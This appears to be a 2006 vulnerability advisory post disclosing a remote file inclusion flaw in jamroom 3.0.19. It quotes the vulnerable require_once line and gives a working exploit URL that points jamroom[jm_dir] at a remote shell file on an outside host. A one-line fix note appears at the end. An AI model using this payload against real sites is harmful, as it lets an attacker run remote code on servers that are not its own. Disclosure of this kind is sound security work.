Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

GEPI <= 1.4.0 gestion/savebackup. php Remote File Include Vulnerability

[ECHO_ADV_56$2006] P-Book <= 1.17 (pb_lang) Remote File Inclusion

HITWEB Remote File Include

Clanlite Remote File Include

From:	x_w0x <x_w0x_(at)_hotmail.com>
Date:	31.10.2006
Subject:	jamroom Remote File Include

#################################
#jamroom-3.0.19                  #
#################################
#Class:     Remote|Local File Include Vulnerability
# Remote:    Yes
# Local:     No
# Type:      High
# $it£ :http://www.jamroom.net/Downloads3_Core
# Author:    x_w0x
# Contact:   x_w0x@hotmail.com
#~~~~~~~~~~~~~~~~~~~~~Ramadan Karim All Musulman~~~~~~~~
###################################
#Vuln Code
=================jamroom-schema.inc.php================
require_once("{$jamroom['jm_dir']}/include/jamroom-writer.inc.
php")
####################################

£xploit:

http://www.victim.com/[path]/include/jamroom-schema.inc.php?jamroom[jm_dir]=http:
//$h£ll.txt?

######
# Solution
# Define Your Vraiable

#Gr££tz : makok i, aZZcoder , xoron , osm@n
#Speciale gr££tz:[ str0k ]  and  elite-team
=========================
#w£lc0m£ In x0|0x
#by x_w0x
# I am h£r£
#========================
#download
:http://www.jamroom.net/index.php?m=td_download&o=download&file_id=43
############################################################